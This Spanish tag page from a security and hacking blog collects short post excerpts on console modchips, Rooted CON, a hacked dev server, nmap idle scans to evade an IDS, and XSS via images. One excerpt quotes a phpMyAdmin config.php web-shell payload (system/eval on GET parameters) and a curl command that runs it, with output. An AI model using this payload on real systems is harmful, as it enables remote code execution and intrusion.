Tag hack - Userlinux.net

Pues al final se ha confirmado una de las mejores noticias en la scene de la PS3, hace unas horas ha salido una especie de chip-stick USB con el cual seríamos capaces de cargar nuestros backups a través del disco duro de la propia consola o de un disco duro externo via USB.

En otras palabras, que ya han tirado la primera piedra del infranqueable muro que protegía la joya de la corona de Sony. Una gran noticia que aparece justo cuando se daba por perdida cualquier esperanza de poder jugar con copias de seguridad.

Por supuesto ya podéis comprar el PSJailbreak modchip de PS3 (así se llama el invento) y comprobar por vosotros mismos que realmente funciona. Y si no os apetece experimentar os animo a que sigáis a nuestros amigos de PDJ, que seguro no dejarán de subir más información, fotos y videos del nuevo y prometedor invento.

No os dejéis llevar por el título, solo se trata de un documental que acabo de ver mientras comía (alguna ventaja tiene que tener el comer sin compañía). Como comentaba por algún sitio, dejando a un lado los tres personajes en los que se centra el documental, desconocía parcialmente parte de la historia que se cuenta y me ha parecido reseñable. Así que, si como a mi, os van estas historias retro es de visionado recomendable.

[Descarga]

Hay un nuevo evento en el panorama de la seguridad informática a nivel nacional. Para despistados -que los habrá :D- estoy hablando de la Rooted CON. Un grupo de profesionales -y fanáticos de la seguridad- se han juntado para ofrecer un congreso con conferencias altamente técnicas desde un enfoque práctico y neutral. Por lo que podemos ver en la sección de ponentes promete demasiado como para ser verdad -¡qué alguien me pellizque!-. Poco a poco se irán confirmando más ponentes y los detalles de cada ponencia:

• Chema Alonso, de Informática64.
• David Barroso, de S21Sec.
• Joxean Koret, de 48bits y Panda Security.
• Alejandro Ramos "dab", de SecurityByDefault.
• Antonio Ramos, de S21Sec.
• David Reguera, de Hispasec Sistemas.
• Rubén Santamarta, de ReverseMode y 48bits.

Todavía no sé si podré asistir porque es entre semana (18, 19 y 20 de marzo) y complicado de compatibilizar en horarios con el resto de las obligaciones.

Será uno de los eventos más interesantes del año en cuanto a seguridad y espero que consiga continuidad. Desde aquí my 2€cents en forma de promoción. (Vía Vierito y Rooted CON).

Uno de nuestros servidores de desarrollo ha sido hackeado como decía hace un rato por twitter. Imagino la cara del intruso al ver cuan sencilla era la contraseña.

Empecemos por el principio, las máquinas de desarrollo no están abiertas "al público", son tan solo eso, máquinas con código en pre-producción en las que trabaja el equipo de desarrollo con lo que la seguridad está bastante descuidada (aún sabiendo que el 90% de los ataques provienen desde dentro, yo me fío de mis compañeros).

Con bastantes frentes abiertos, la verdad ni se me ocurrió repasar todos esos puntos que debería haber repasado -si, entono el mea culpa- antes de abrir el equipo a La Red para que un compañero pudiera acceder desde remoto.

Seguimos descubriendo características de Metasploit y quedándonos boquiabiertos con todo el poder de esta fantástica -y controvertida- herramienta.

Pensándolo con frialdad hasta me he planteado la escritura de este post, me preocupa la ética de los posibles lectores... pero visto de otra forma ni estoy descubriendo nada nuevo ni quiero hacer apología del non full disclosure así que -muy por encima pero- allá vamos.

Hoy intentaremos saltarnos un sistema de detección de intrusos (IDS), al menos en teoría, porque no tengo ninguna maqueta montada para probarlo realmente. A la hora de usar nmap para comprobar la disponibilidad de algunos puertos de una Red es muy posible que cualquier IDS detecte los escaneos y emprenda algún tipo de acción.

El idle scanning se sirve del IPID para echarle el muerto del escaneo a otro ordenador zombie con lo que para hacerlo efectivo debemos -antes de nada- encontrar ese ordenador adecuado al que culpar.

He visto la imagen en Focus.com y en Sabe más el diablo, me ha parecido muy interesante quedarme con una copia -y eso que todavía no he tenido tiempo a leerla entera-, ahí va:

It's a bash script that injects code into config.php allowing remote code execution: $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '(pre)';system($_GET['c']);echo '(/pre)';}if($_GET['p']){echo '(pre)';eval($_GET['p']);echo '(/pre)';};//'] = 'localhost'; By the way, in a infected system we could execute some commands like this: $ curl "http://dominio-afectado/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/" total 96 drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin drwxr-xr-x 3 root root 4096 May 6 10:01 boot drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc drwxr-xr-x 3 root root 4096 Oct 18 2008 home drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd [...] I think you would read the proof of concept carefully.

Esta mañana hemos estado probando una nueva forma de XSS: a través de código en imágenes maliciosas }:).

El XSS no es más que un tipo de ataque o agujero basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado (wikipedia dixit).

Espero que se entienda mejor con un pequeño taller de 5 minutos, ejemplo incluido.

Una de las cosas que le echaba en falta a la Nintendo Wii era el poder reproducir Divx, tarea imposible con la consola de serie, aunque nada complicado de complementar con un poco de paciencia.

En primer lugar debemos asegurarnos de la versión de la consola puesto que dependiendo de este factor procederemos de una u otra forma:

• v.3.2 (U -USA-, E -Europa- ó J -Japo-) - Método chip
• v.3.3 - Método Twilight Princess

En el menú de configuración de la Wii podemos conocer la versión de la misma.